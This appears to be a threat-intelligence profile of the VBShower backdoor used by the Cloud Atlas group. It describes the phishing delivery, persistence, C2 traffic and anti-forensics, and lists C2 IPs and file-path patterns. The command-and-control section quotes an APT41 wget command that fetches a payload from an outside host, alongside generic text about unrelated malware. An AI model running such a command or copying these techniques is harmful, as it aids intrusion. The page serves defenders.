VBShower
VBShower is a polymorphic VBS-based backdoor/launcher used by the Cloud Atlas (also known as Inception) espionage group. It has been observed in multi-stage phishing campaigns targeting organizations primarily in Eastern Europe and Central Asia, with reporting specifically noting heavy targeting of Russian organizations and additional victims in Belarus, Canada, Moldova, Israel, Kyrgyzstan, Vietnam, and Turkey. Initial access is delivered through phishing emails carrying malicious Microsoft Word documents that load remote templates and exploit Microsoft Equation Editor vulnerability CVE-2018-0802, ultimately downloading and executing an HTA file. That HTA extracts and creates several VBS files on disk that form the VBShower backdoor, including launcher/cleaner components and an encrypted payload, with some reporting noting storage under %APPDATA%\Roaming\Microsoft\Windows\ using NTFS alternate data streams.
VBShower serves as the primary launcher component and replaced PowerShower as a validator in newer Cloud Atlas chains. It establishes persistence via a Run registry key that launches a VBS script with wscript, and it has been reported to repeatedly check and restore its autorun key if removed. It decrypts its backdoor in multiple stages and executes it in memory. VBShower can execute downloaded VBScript files regardless of file size, and has attempted to retrieve VBS tasking from command-and-control servers over HTTP. Reporting states it can execute downloaded scripts either in memory or from NTFS alternate data streams depending on size, and send TMP files containing payload output back to C2 via HTTP POST.
VBShower has anti-forensic behavior: it attempts to delete files or erase contents in Temporary Internet Files\Content.Word paths associated with malicious documents and templates to hinder forensic analysis. Observed payloads and follow-on activity include installation of other Cloud Atlas malware families, notably PowerShower, VBCloud, and the CloudAtlas backdoor. Reported VBShower-delivered tasks include host, user, registry Run key, file inventory, process, and scheduled task collection. Public reporting also lists VBShower-related file paths such as %APPDATA%[A-Za-z]{5}.vbs.dat, %APPDATA%[A-Za-z]{5}.vbs, and %APPDATA%[A-Za-z]{5}.mds, persistence under HKCU\Software\Microsoft\Windows\CurrentVersion\Run[a-f0-9A-F]{8}, and C2 IPs 176.31.59.232 and 144.217.174.57.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
Victims get infected via phishing emails containing a malicious document that exploits a vulnerability in the formula editor (CVE-2018-0802) to download and execute malware code. | The malicious HTA file extracts and writes several files to disk that are parts of the VBShower backdoor. VBShower then downloads and installs another backdoor: PowerShower.
Groups observed using it
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
The malicious HTA file extracts and writes several files to disk that are parts of the VBShower backdoor. VBShower then downloads and installs another backdoor: PowerShower.
Techniques & procedures
17 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
2 techniques
Initial Access
Execution
2 techniques
Execution
VBShower::Launcher ... using the Execute() function to pass control to that file.
When opened, the document downloads a malicious template formatted as an RTF file from a remote server controlled by the attackers. It contains a formula editor exploit that downloads and runs an HTML Application (HTA) file hosted on the same C2 server.
Persistence
1 technique
Persistence
Privilege Escalation
1 technique
Privilege Escalation
Stealth
5 techniques
Stealth
Many examples describe post-intrusion cleanup, anti-forensics, and removal of artifacts such as logs, scripts, malware components, scheduled tasks, registry keys, and temporary files.
VBShower::Cleaner ... removing malicious documents and templates it downloaded from the web during the attack.
It contains a formula editor exploit that downloads and runs an HTML Application (HTA) file hosted on the same C2 server.
Discovery
4 techniques
Discovery
Command and Control
2 techniques
Command and Control
The content repeatedly describes threat actors, malware, and campaigns using HTTP and/or HTTPS for command and control, including examples such as BlackEnergy communicating with C2 over HTTP POST requests and many other families using HTTP/S for C2.
Examples include: "APT41 used HTTP to download payloads for CVE-2019-19781 and CVE-2020-10189 exploits," "During C0017, APT41 ran wget http://103.224.80[.]44:8080/kernel to download malicious payloads," and multiple malware families "use HTTP GET requests" or similar to download files/payloads.
IOCs tracked for this family
38 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Recent activity
12 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Custom malware delivered after a malicious Word document loads a remote template from C2 and exploits CVE-2018-0802; VBShower is downloaded using alternate data streams.
VBShower is a backdoor used by the Cloud Atlas threat actor, delivered via phishing documents. It downloads and installs other backdoors and can be used to exfiltrate files and gather information.
Primary launcher backdoor used by Cloud Atlas APT to execute downloaded VB scripts and deploy additional payloads. It communicates with command servers to retrieve and execute scripts for file exfiltration, system enumeration, and credential harvesting.
VBShower is a VBS-based backdoor used as an initial stage in the Cloud Atlas infection chain. It is responsible for downloading and installing additional backdoors (PowerShower, VBCloud, CloudAtlas), collecting system information, and facilitating persistence and further payload delivery.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.